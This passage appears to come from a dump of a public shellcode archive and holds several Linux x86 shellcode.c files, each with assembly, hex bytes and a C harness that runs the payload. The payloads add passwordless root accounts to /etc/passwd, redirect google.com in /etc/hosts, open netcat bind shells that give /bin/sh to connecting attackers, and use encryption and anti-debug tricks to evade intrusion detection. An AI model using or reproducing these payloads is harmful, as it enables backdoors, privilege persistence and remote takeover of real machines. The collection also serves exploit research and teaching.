"\x6e\x68\x6e\x2f\x70\x61\x68" 59 | "\x72\x2f\x62\x69\x68\x2f\x2f" 60 | "\x75\x73\x89\xe3\x52\x56\x51" 61 | "\x53\x89\xe1\xb0\x0b\x99\xcd" 62 | "\x80"; 63 | 64 | printf("Length: %d\n",strlen(shellcode)); 65 | (*(void(*)()) shellcode)(); 66 | 67 | return 0; 68 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Obfuscated_Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux x86 - map google.com to 127.1.1.1 in /etc/hosts 3 | * Obfuscated version - 98 bytes 4 | * Original: http://shell-storm.org/shellcode/files/shellcode-893.php 5 | * Author: xmgv 6 | * Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/ 7 | */ 8 | 9 | /* 10 | global _start 11 | 12 | section .text 13 | 14 | _start: 15 | push byte 0x4 16 | pop eax 17 | inc eax 18 | sub edx, edx 19 | push edx 20 | mov ecx, 0x88998899 21 | sub ecx, 0x1525152A 22 | push ecx 23 | sub ecx, 0x0B454440 24 | push ecx 25 | sub ecx, 0x04BACA01 26 | inc ecx 27 | push ecx 28 | sub ecx, 0x6374612E 29 | mov ebx, esp 30 | int 0x80 31 | xchg eax, ebx 32 | jmp short _load_data 33 | 34 | _write: 35 | pop eax 36 | xchg eax, ecx 37 | push byte 0x3 38 | pop esi 39 | mov eax, esi 40 | inc eax 41 | push len 42 | pop edx 43 | int 0x80 44 | inc esi 45 | inc esi 46 | inc esi 47 | xchg eax, esi 48 | int 0x80 49 | inc eax 50 | int 0x80 51 | 52 | _load_data: 53 | call _write 54 | google: db "127.1.1.1 google.com" 55 | len: equ $-google 56 | 57 | _random: 58 | cld 59 | xor esi,esi 60 | cld 61 | */ 62 | 63 | #include 64 | #include 65 | 66 | unsigned char code[] = 67 | "\x6a\x04\x58\x40\x29\xd2\x52\xb9\x99\x88\x99\x88\x81\xe9\x2a\x15\x25\x15" 68 | "\x51\x81\xe9\x40\x44\x45\x0b\x51\x81\xe9\x01\xca\xba\x04\x41\x51\x81\xe9" 69 | "\x2e\x61\x74\x63\x89\xe3\xcd\x80\x93\xeb\x16\x58\x91\x6a\x03\x5e\x89\xf0" 70 | "\x40\x6a\x14\x5a\xcd\x80\x46\x46\x46\x96\xcd\x80\x40\xcd\x80\xe8\xe5\xff" 71 | "\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65" 72 | "\x2e\x63\x6f\x6d\xfc\x31\xf6\xfc"; 73 | 74 | int main() { 75 | printf("Shellcode Length: %d\n", strlen(code)); 76 | int (*ret)() = (int(*)())code; 77 | ret(); 78 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Shellcode__77_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /** 2 | 3 | ;modify_hosts.asm 4 | ;this program add a new entry in hosts file pointing google.com to 127.1.1.1 5 | ;author Javier Tejedor 6 | ;date 24/09/2014 7 | 8 | global _start 9 | 10 | section .text 11 | 12 | _start: 13 | xor ecx, ecx 14 | mul ecx 15 | mov al, 0x5 16 | push ecx 17 | push 0x7374736f ;/etc///hosts 18 | push 0x682f2f2f 19 | push 0x6374652f 20 | mov ebx, esp 21 | mov cx, 0x401 ;permmisions 22 | int 0x80 ;syscall to open file 23 | 24 | xchg eax, ebx 25 | push 0x4 26 | pop eax 27 | jmp short _load_data ;jmp-call-pop technique to load the map 28 | 29 | _write: 30 | pop ecx 31 | push 20 ;length of the string, dont forget to modify if changes the map 32 | pop edx 33 | int 0x80 ;syscall to write in the file 34 | 35 | push 0x6 36 | pop eax 37 | int 0x80 ;syscall to close the file 38 | 39 | push 0x1 40 | pop eax 41 | int 0x80 ;syscall to exit 42 | 43 | _load_data: 44 | call _write 45 | google db "127.1.1.1 google.com" 46 | **/ 47 | 48 | #include 49 | #include 50 | 51 | unsigned char code[] = \ 52 | "\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x6f\x73\x74\x73\x68\x2f\x2f\x2f\x68\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x93\x6a\x04\x58\xeb\x10\x59\x6a\x14\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xeb\xff\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d"; 53 | 54 | main() 55 | { 56 | 57 | printf("Shellcode Length: %d\n", strlen(code)); 58 | 59 | int (*ret)() = (int(*)())code; 60 | 61 | ret(); 62 | 63 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User_Shellcode__104_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Source to this is pass.s 3 | * This will append a root line to the passwd file (see the source). 4 | * 5 | * Shok (Matt Conover), shok@dataforce.net 6 | */ 7 | 8 | char shellcode[]= 9 | "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb" 10 | "\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba\xa4" 11 | "\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x41\x01\xf9\x31" 12 | "\xd2\xb2\x1f\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f" 13 | "\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x77\x30\x30\x77\x30" 14 | "\x30\x3a\x3a\x30\x3a\x30\x3a\x77\x30\x77\x30\x77\x21\x3a\x2f\x3a" 15 | "\x2f\x62\x69\x6e\x2f\x73\x68\x0a"; 16 | 17 | void main() 18 | { 19 | 20 | int *ret; 21 | 22 | printf("w00w00!\n"); 23 | ret = (int *)&ret + 2; 24 | (*ret) = (int)shellcode; 25 | } 26 | 27 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__r00t__To__etc_passwd_Shellcode__69_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* By Kris Katterjohn 11/14/2006 2 | * 3 | * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd 4 | * 5 | * for Linux/x86 6 | * 7 | * 8 | * 9 | * section .text 10 | * 11 | * global _start 12 | * 13 | * _start: 14 | * 15 | * ; open("/etc//passwd", O_WRONLY | O_APPEND) 16 | * 17 | * push byte 5 18 | * pop eax 19 | * xor ecx, ecx 20 | * push ecx 21 | * push 0x64777373 22 | * push 0x61702f2f 23 | * push 0x6374652f 24 | * mov ebx, esp 25 | * mov cx, 02001Q 26 | * int 0x80 27 | * 28 | * mov ebx, eax 29 | * 30 | * ; write(ebx, "r00t::0:0:::", 12) 31 | * 32 | * push byte 4 33 | * pop eax 34 | * xor edx, edx 35 | * push edx 36 | * push 0x3a3a3a30 37 | * push 0x3a303a3a 38 | * push 0x74303072 39 | * mov ecx, esp 40 | * push byte 12 41 | * pop edx 42 | * int 0x80 43 | * 44 | * ; close(ebx) 45 | * 46 | * push byte 6 47 | * pop eax 48 | * int 0x80 49 | * 50 | * ; exit() 51 | * 52 | * push byte 1 53 | * pop eax 54 | * int 0x80 55 | */ 56 | 57 | main() 58 | { 59 | char shellcode[] = 60 | "\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68" 61 | "\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66" 62 | "\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2" 63 | "\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68" 64 | "\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a" 65 | "\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80"; 66 | 67 | (*(void (*)()) shellcode)(); 68 | } 69 | 70 | // milw0rm.com [2006-11-17] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__t00r__Anti-IDS_Shellcode__116_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * !!!!!! ANTI IDS SHELLCODE !!!!!! 3 | * 4 | * s0t4ipv6@shellcode.com.ar 5 | * 0x14abril0x7d2 6 | * 7 | * !!!!! ENCRIPTADA !!!!! 8 | 9 | * 116 bytes 10 | * Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd 11 | 12 | * !!!!! ENCRIPTADA !!!!! 13 | * 14 | * Para mas informacion 15 | * Descargue http://www.shellcode.com.ar/Projects/JempiScodes(version).tgz 16 | * 17 | * !!!!!! ANTI IDS SHELLCODE !!!!!! 18 | */ 19 | 20 | #include 21 | 22 | char shellcode[]= 23 | "\xeb\x1b\x5f\x31\xc0\x6a\x28\x6a\x52\x59\x49\x5b\x8a\x04\x0f" 24 | "\xf6\xd3\x30\xd8\x88\x04\x0f\x50\x85\xc9\x75\xef\xeb\x05\xe8" 25 | "\xe0\xff\xff\xff\x0e\x6f\xc7\xe4\xff\xfb\xec\xf3\xf4\xb3\xa0" 26 | "\xee\xf6\xb8\xff\xb5\xee\x02\x95\x91\x3a\xb5\x70\x32\xba\x37" 27 | "\xb2\xf6\xb5\xbb\xb2\x04\x07\x86\x5c\x21\xb2\x2e\xc6\xf9\xbe" 28 | "\xa3\xe4\xff\xad\xea\xb2\xf4\xfe\xa7\xf5\xff\xea\xb8\xad\xff" 29 | "\xf5\xf5\xad\xe3\xbb\xff\xbd\x3f\x59\x66\x33\xba\x72\x97\xd3" 30 | "\xb2\x4e\x0e\x8f\x49\x34\xb2\x3f\x72\xb2\x57"; 31 | 32 | main() { 33 | int *ret; 34 | ret=(int *)&ret+2; 35 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 36 | (*ret) = (int)shellcode; 37 | } 38 | 39 | // milw0rm.com [2004-09-26] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__t00r__Shellcode__82_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * s0t4ipv6@shellcode.com.ar 3 | * 0x14abril0x7d2 4 | * 5 | * 82 bytes 6 | * Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd 7 | * 8 | * Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c 9 | * 10 | */ 11 | 12 | #include 13 | 14 | // Shellcode // Asm Code 15 | char shellcode[]= 16 | "\x31\xc0" // xorl %eax,%eax 17 | "\x50" // pushl %eax 18 | "\x68\x73\x73\x77\x64" // pushl $0x64777373 19 | "\x68\x63\x2f\x70\x61" // pushl $0x61702f63 20 | "\x68\x2f\x2f\x65\x74" // pushl $0x74652f2f 21 | "\x89\xe3" // movl %esp,%ebx 22 | "\x8d\x48\x02" // leal 0x2(%eax),%ecx 23 | "\x8d\x40\x05" // leal 0x5(%eax),%eax 24 | "\xcd\x80" // int $0x80 25 | "\x89\xc3" // movl %eax,%ebx 26 | "\x87\xca" // xchgl %ecx,%edx 27 | "\x31\xc9" // xorl %ecx,%ecx 28 | "\xb0\x13" // movb $0x13,%al 29 | "\xcd\x80" // int $0x80 30 | "\x51" // pushl %ecx 31 | "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e 32 | "\x68\x3a\x2f\x62\x69" // pushl $0x69622f3a 33 | "\x68\x30\x3a\x3a\x2f" // pushl $0x2f3a3a30 34 | "\x68\x3a\x3a\x30\x3a" // pushl $0x3a303a3a 35 | "\x68\x74\x30\x30\x72" // pushl $0x72303074 36 | "\x8d\x41\x04" // leal 0x4(%ecx),%eax 37 | "\x89\xe1" // movl %esp,%ecx 38 | "\xb2\x14" // movb $0x14,%dl 39 | "\xcd\x80" // int $0x80 40 | "\x31\xc0" // xorl %eax,%eax 41 | "\xb0\x06" // movb $0x6,%al 42 | "\xcd\x80" // int $0x80 43 | "\x40" // incl %eax 44 | "\xcd\x80"; // int $0x80 45 | 46 | main() { 47 | int *ret; 48 | ret=(int *)&ret+2; 49 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 50 | (*ret) = (int)shellcode; 51 | } 52 | 53 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__toor__To__etc_passwd_+_exit___Shellcode__107_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | append_passwd.c 3 | Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding a password-less root account with login name "toor" 4 | Platform: linux/x86 5 | Size: 107 bytes 6 | Author: $andman 7 | */ 8 | 9 | /* 10 | 08049054 <_start>: 11 | 8049054: eb 38 jmp 804908e 12 | 13 | 08049056 : 14 | 8049056: 5e pop %esi 15 | 8049057: 31 c0 xor %eax,%eax 16 | 8049059: 88 46 0b mov %al,0xb(%esi) 17 | 804905c: 88 46 2b mov %al,0x2b(%esi) 18 | 804905f: c6 46 2a 0a movb $0xa,0x2a(%esi) 19 | 8049063: 8d 5e 0c lea 0xc(%esi),%ebx 20 | 8049066: 89 5e 2c mov %ebx,0x2c(%esi) 21 | 8049069: 8d 1e lea (%esi),%ebx 22 | 804906b: 66 b9 42 04 mov $0x442,%cx 23 | 804906f: 66 ba a4 01 mov $0x1a4,%dx 24 | 8049073: b0 05 mov $0x5,%al 25 | 8049075: cd 80 int $0x80 26 | 8049077: 89 c3 mov %eax,%ebx 27 | 8049079: 31 d2 xor %edx,%edx 28 | 804907b: 8b 4e 2c mov 0x2c(%esi),%ecx 29 | 804907e: b2 1f mov $0x1f,%dl 30 | 8049080: b0 04 mov $0x4,%al 31 | 8049082: cd 80 int $0x80 32 | 8049084: b0 06 mov $0x6,%al 33 | 8049086: cd 80 int $0x80 34 | 8049088: b0 01 mov $0x1,%al 35 | 804908a: 31 db xor %ebx,%ebx 36 | 804908c: cd 80 int $0x80 37 | 38 | 0804908e : 39 | 804908e: e8 c3 ff ff ff call 8049056 40 | 8049093: ......string....... 41 | */ 42 | 43 | #include 44 | #include 45 | 46 | char shell[]= "\xeb\x38\x5e\x31\xc0\x88\x46\x0b\x88\x46\x2b\xc6\x46\x2a\x0a\x8d\x5e\x0c\x89\x5e\x2c\x8d\x1e" 47 | "\x66\xb9\x42\x04\x66\xba\xa4\x01\xb0\x05\xcd\x80\x89\xc3\x31\xd2\x8b\x4e\x2c\xb2\x1f\xb0\x04" 48 | "\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70" 49 | "\x61\x73\x73\x77\x64\x23\x74\x6f\x6f\x72\x3a\x3a\x30\x3a\x30\x3a\x74\x30\x30\x72\x3a\x2f\x72" 50 | "\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x23"; 51 | main(){ 52 | printf("[+]shellcode length %d\n", strlen(shell)); 53 | int *ret; 54 | ret = (int *)&ret + 2; 55 | (*ret) = (int)shell; 56 | } 57 | //HAPPY NEW YEAR! 58 | //#$ -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__xtz__To__etc_passwd_Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) adds user 'xtz' without password to /etc/passwd - 59 bytes 3 | * - izik 4 | */ 5 | 6 | char shellcode[] = 7 | 8 | "\x6a\x05" // push $0x5 9 | 10 | // 11 | // <_exit>: 12 | // 13 | 14 | "\x58" // pop %eax 15 | "\x99" // cltd 16 | "\x31\xc9" // xor %ecx,%ecx 17 | "\x66\xb9\x01\x04" // mov $0x401,%cx 18 | "\x52" // push %edx 19 | "\x68\x73\x73\x77\x64" // push $0x64777373 20 | "\x68\x63\x2f\x70\x61" // push $0x61702f63 21 | "\x68\x2f\x2f\x65\x74" // push $0x74652f2f 22 | "\x89\xe3" // mov %esp,%ebx 23 | "\xcd\x80" // int $0x80 24 | "\x68\x3a\x3a\x3a\x0a" // push $0xa3a3a3a 25 | "\x68\x3a\x30\x3a\x30" // push $0x303a303a 26 | "\x68\x78\x74\x7a\x3a" // push $0x3a7a7478 27 | "\x89\xc3" // mov %eax,%ebx 28 | "\xb0\x04" // mov $0x4,%al 29 | "\x89\xe1" // mov %esp,%ecx 30 | "\xb2\x0c" // mov $0xc,%dl 31 | "\xcd\x80" // int $0x80 32 | "\x6a\x01" // push $0x1 33 | "\xeb\xc7"; // jmp <_exit> 34 | 35 | int main(int argc, char **argv) { 36 | int *ret; 37 | ret = (int *)&ret + 2; 38 | (*ret) = (int) shellcode; 39 | } 40 | 41 | // milw0rm.com [2006-01-21] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__z__Shellcode__70_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux/x86 3 | * 4 | * Appends the line "z::0:0:::\n" to /etc/passwd. 5 | * (quite old, could be optimized further) 6 | */ 7 | #include 8 | 9 | char c0de[] = 10 | /* main: */ 11 | "\xeb\x29" /* jmp callz */ 12 | /* start: */ 13 | "\x5e" /* popl %esi */ 14 | "\x29\xc0" /* subl %eax, %eax */ 15 | "\x88\x46\x0b" /* movb %al, 0x0b(%esi) */ 16 | "\x89\xf3" /* movl %esi, %ebx */ 17 | "\x66\xb9\x01\x04" /* movw $0x401, %cx */ 18 | "\x66\xba\xb6\x01" /* movw $0x1b6, %dx */ 19 | "\xb0\x05" /* movb $0x05, %al */ 20 | "\xcd\x80" /* int $0x80 */ 21 | "\x93" /* xchgl %eax, %ebx */ 22 | "\x29\xc0" /* subl %eax, %eax */ 23 | "\x29\xd2" /* subl %edx, %edx */ 24 | "\xb0\x04" /* movb $0x04, %al */ 25 | "\x89\xf1" /* movl %esi, %ecx */ 26 | "\x80\xc1\x0c" /* addb $0x0c, %cl */ 27 | "\xb2\x0a" /* movb $0x0a, %dl */ 28 | "\xcd\x80" /* int $0x80 */ 29 | "\x29\xc0" /* subl %eax, %eax */ 30 | "\x40" /* incl %eax */ 31 | "\xcd\x80" /* int $0x80 */ 32 | /* callz: */ 33 | "\xe8\xd2\xff\xff\xff" /* call start */ 34 | /* DATA */ 35 | "/etc/passwd" 36 | "\xff" 37 | "z::0:0:::\n"; 38 | 39 | main() { 40 | int *ret; 41 | ret=(int *)&ret +2; 42 | printf("Shellcode lenght=%d\n",strlen(c0de)); 43 | (*ret) = (int)c0de; 44 | } 45 | 46 | // milw0rm.com [2000-08-07] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Alphanumeric_Encoded_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------*/ 2 | /* 64 byte alpha-numeric shellcode */ 3 | /* by XORt@dallas_2600 64bytes */ 4 | /*--------------------------------------*/ 5 | "\x6a\x30" /* pushb $0x30 */ 6 | "\x58" /* pop %eax */ 7 | "\x34\x30" /* xorb $0x30, %al */ 8 | "\x50" /* push %eax */ 9 | "\x5a" /* pop %edx */ 10 | "\x48" /* dec %eax */ 11 | "\x66\x35\x41\x30" /* xorl $0x3041, %ax */ 12 | "\x66\x35\x73\x4f" /* xorl $0x4f73, %ax */ 13 | "\x50" /* push %eax */ 14 | "\x52" /* pushl %edx */ 15 | "\x58" /* pop %eax */ 16 | "\x684J4A" /* pushl "4J4A" */ 17 | "\x68PSTY" /* pushl "PSTY" */ 18 | "\x68UVWa" /* pushl "UVWa" */ 19 | "\x68QRPT" /* pushl "QRPT" */ 20 | "\x68PTXR" /* pushl "PTXR" */ 21 | "\x68binH" /* pushl "binH" */ 22 | "\x68IQ50" /* pushl "IQ50" */ 23 | "\x68shDY" /* pushl "shDY" */ 24 | "\x68Rha0" /* pushl "Rha0" */ 25 | /*--------------------------------------*/ 26 | 27 | 28 | // milw0rm.com [2004-12-22] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Alphanumeric_Encoder__IMUL_Method__Shellcode__88_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------*/ 2 | /* Alpha-Numeric Shellcode using IMUL Method */ 3 | /* By XORt@dallas_2600) 88bytes */ 4 | /*-----------------------------------------------------*/ 5 | "\x68\x69\x58\x69\x6b" /* push $0x6b695869 */ 6 | "\x68\x7a\x36\x37\x70" /* push $0x7037367a */ 7 | "\x68\x58\x58\x41\x73" /* push $0x73415858 */ 8 | "\x68\x71\x4a\x77\x79" /* push $0x79774a71 */ 9 | "\x68\x65\x77\x57\x31" /* push $0x31577765 */ 10 | "\x68\x42\x69\x57\x77" /* push $0x6850c031 */ 11 | "\x50\x50\x50\x50\x50" /* 17 push %eax's */ 12 | "\x50\x50\x50\x50\x50" /* */ 13 | "\x50\x50\x50\x50\x50" /* */ 14 | "\x50\x50" /* */ 15 | "\x54" /* push %esp */ 16 | "\x59" /* pop %ecx */ 17 | "\x6b\x51\x58\x57" /* imul $0x57, 0x58(%ecx), %edx */ 18 | "\x42" /* inc %edx */ 19 | "\x52" /* push %edx */ 20 | "\x6b\x41\x54\x78" /* imul $0x78, 0x54(%ecx), %edx */ 21 | "\x34\x63" /* xor $0x63, %al */ 22 | "\x50" /* push %eax */ 23 | "\x6b\x51\x50\x4a" /* imul $0x4a, 0x50(%ecx), %edx */ 24 | "\x4a" /* dec %edx */ 25 | "\x4a" /* dec %edx */ 26 | "\x52" /* push %edx */ 27 | "\x6b\x51\x4c\x79" /* imul $0x79, 0x4c(%ecx), %edx */ 28 | "\x4a" /* dec %edx */ 29 | "\x52" /* push %edx */ 30 | "\x6b\x41\x48\x36" /* imul $0x36, 0x48(%ecx), %edx */ 31 | "\x34\x61" /* xor $0x61, %al */ 32 | "\x50" /* push %eax */ 33 | "\x6b\x51\x44\x79" /* imul $0x79, 0x44(%ecx), %edx */ 34 | "\x4a" /* dec %edx */ 35 | "\x52" /* push %edx */ 36 | /*------------------------------------------[bytes:88]-*/ 37 | 38 | 39 | // milw0rm.com [2004-12-22] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Anti-Debug_Trick__INT_3h_trap__+_execve__bin_sh_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) anti-debug trick (INT 3h trap) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 39 bytes 3 | * 4 | * The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS 5 | * would try to x86-emulate the shellcode it would *glitch* and fail. This also protectes the shellcode 6 | * from running within a debugger environment such as gdb and strace. 7 | * 8 | * How this works? the shellcode registers for the SIGTRAP signal (aka. Breakpoint Interrupt) and use it 9 | * to call the acutal payload (e.g. _evil_code) while a greedy debugger or a confused x86-emu won't pass 10 | * the signal handler to the shellcode, it would end up doing _exit() instead execuve() 11 | * 12 | * - izik 13 | */ 14 | 15 | char shellcode[] = 16 | 17 | "\x6a\x30" // push $0x30 18 | "\x58" // pop %eax 19 | "\x6a\x05" // push $0x5 20 | "\x5b" // pop %ebx 21 | "\xeb\x05" // jmp <_evil_code> 22 | 23 | // 24 | // <_evilcode_loc>: 25 | // 26 | 27 | "\x59" // pop %ecx 28 | "\xcd\x80" // int $0x80 29 | "\xcc" // int3 30 | "\x40" // inc %eax 31 | "\xe8\xf6\xff\xff\xff" // call <_evilcode_loc> 32 | "\x99" // cltd 33 | 34 | // 35 | // <_evil_code>: 36 | // 37 | 38 | "\xb0\x0b" // mov $0xb,%al 39 | "\x52" // push %edx 40 | "\x68\x2f\x2f\x73\x68" // push $0x68732f2f 41 | "\x68\x2f\x62\x69\x6e" // push $0x6e69622f 42 | "\x89\xe3" // mov %esp,%ebx 43 | "\x52" // push %edx 44 | "\x53" // push %ebx 45 | "\x54" // push %esp 46 | "\xeb\xe1"; // jmp <_evilcode_loc> 47 | 48 | int main(int argc, char **argv) { 49 | int *ret; 50 | ret = (int *)&ret + 2; 51 | (*ret) = (int) shellcode; 52 | } 53 | 54 | // milw0rm.com [2006-01-21] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_Netcat_Shell__13377_TCP__Shellcode__Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | linux x86 nc -lvve/bin/sh -p13377 shellcode 2 | This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker 3 | Author: Anonymous 4 | Site: http://chaossecurity.wordpress.com/ 5 | Here is code written in NASM 6 | 7 | ///////////////////////////// 8 | section .text 9 | global _start 10 | _start: 11 | xor eax,eax 12 | xor edx,edx 13 | push 0x37373333 14 | push 0x3170762d 15 | mov edx, esp 16 | push eax 17 | push 0x68732f6e 18 | push 0x69622f65 19 | push 0x76766c2d 20 | mov ecx,esp 21 | push eax 22 | push 0x636e2f2f 23 | push 0x2f2f2f2f 24 | push 0x6e69622f 25 | mov ebx, esp 26 | push eax 27 | push edx 28 | push ecx 29 | push ebx 30 | xor edx,edx 31 | mov ecx,esp 32 | mov al,11 33 | int 0x80 34 | ////////////////////////////////// 35 | And here is objdump from which you can see the shellcode 36 | 37 | ////////////////////////////////// 38 | teo@teo-desktop ~ $ objdump -d a.out 39 | 40 | a.out: file format elf32-i386 41 | 42 | 43 | Disassembly of section .text: 44 | 45 | 08048060 <.text>: 46 | 8048060: 31 c0 xor %eax,%eax 47 | 8048062: 31 d2 xor %edx,%edx 48 | 8048064: 68 33 33 37 37 push $0x37373333 49 | 8048069: 68 2d 76 70 31 push $0x3170762d 50 | 804806e: 89 e2 mov %esp,%edx 51 | 8048070: 50 push %eax 52 | 8048071: 68 6e 2f 73 68 push $0x68732f6e 53 | 8048076: 68 65 2f 62 69 push $0x69622f65 54 | 804807b: 68 2d 6c 76 76 push $0x76766c2d 55 | 8048080: 89 e1 mov %esp,%ecx 56 | 8048082: 50 push %eax 57 | 8048083: 68 2f 2f 6e 63 push $0x636e2f2f 58 | 8048088: 68 2f 2f 2f 2f push $0x2f2f2f2f 59 | 804808d: 68 2f 62 69 6e push $0x6e69622f 60 | 8048092: 89 e3 mov %esp,%ebx 61 | 8048094: 50 push %eax 62 | 8048095: 52 push %edx 63 | 8048096: 51 push %ecx 64 | 8048097: 53 push %ebx 65 | 8048098: 31 d2 xor %edx,%edx 66 | 804809a: 89 e1 mov %esp,%ecx 67 | 804809c: b0 0b mov $0xb,%al 68 | 804809e: cd 80 int $0x80 -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_Netcat_Shell__5555_TCP__Shellcode__60_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #Greetz : Bomberman(Leader) 2 | #Author : B3mB4m 3 | #Concat : Do not disturb - Bomberman 4 | 5 | 6 | #Netcat openbsd version (which is default installed in ubuntu) have not "-e" option. 7 | #So if you are trying to test on ubuntu(like me) you must change version to traditional. 8 | 9 | #Typing this: 10 | #1) sudo update-alternatives --config nc 11 | #2) Select the option /bin/nc.traditional 12 | 13 | 14 | Disassembly of section .text: 15 | 16 | 08048060 <.text>: 17 | 8048060: 31 c0 xor %eax,%eax 18 | 8048062: 50 push %eax 19 | 8048063: 68 6e 2f 6e 63 push $0x636e2f6e 20 | 8048068: 68 2f 2f 62 69 push $0x69622f2f 21 | 804806d: 89 e3 mov %esp,%ebx 22 | 804806f: 50 push %eax 23 | 8048070: 68 35 35 35 35 push $0x35353535 #PORT 24 | 8048075: 68 2d 6c 74 70 push $0x70746c2d 25 | 804807a: 89 e1 mov %esp,%ecx 26 | 804807c: 50 push %eax 27 | 804807d: 68 2f 2f 73 68 push $0x68732f2f 28 | 8048082: 68 2f 62 69 6e push $0x6e69622f 29 | 8048087: 68 2d 65 2f 2f push $0x2f2f652d 30 | 804808c: 89 e2 mov %esp,%edx 31 | 804808e: 50 push %eax 32 | 804808f: 52 push %edx 33 | 8048090: 51 push %ecx 34 | 8048091: 53 push %ebx 35 | 8048092: 89 e7 mov %esp,%edi 36 | 8048094: b0 0b mov $0xb,%al 37 | 8048096: 89 f9 mov %edi,%ecx 38 | 8048098: 31 d2 xor %edx,%edx 39 | 804809a: cd 80 int $0x80 40 | 41 | #include 42 | #include 43 | 44 | char *loveme = "\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x35\x35\x35" 45 | "\x35\x68\x2d\x6c\x74\x70\x89\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68" 46 | "\x2d\x65\x2f\x2f\x89\xe2\x50\x52\x51\x53\x89\xe7\xb0\x0b\x89\xf9\x31\xd2\xcd\x80"; 47 | 48 | // "\x68-----\x35\x35\x35\x35\-------x68\" There port change however you like. 49 | 50 | int main(void){ 51 | fprintf(stdout,"Length: %d\n",strlen(loveme)); 52 | (*(void(*)()) loveme)();} -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__13337_TCP__Shellcode__56_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 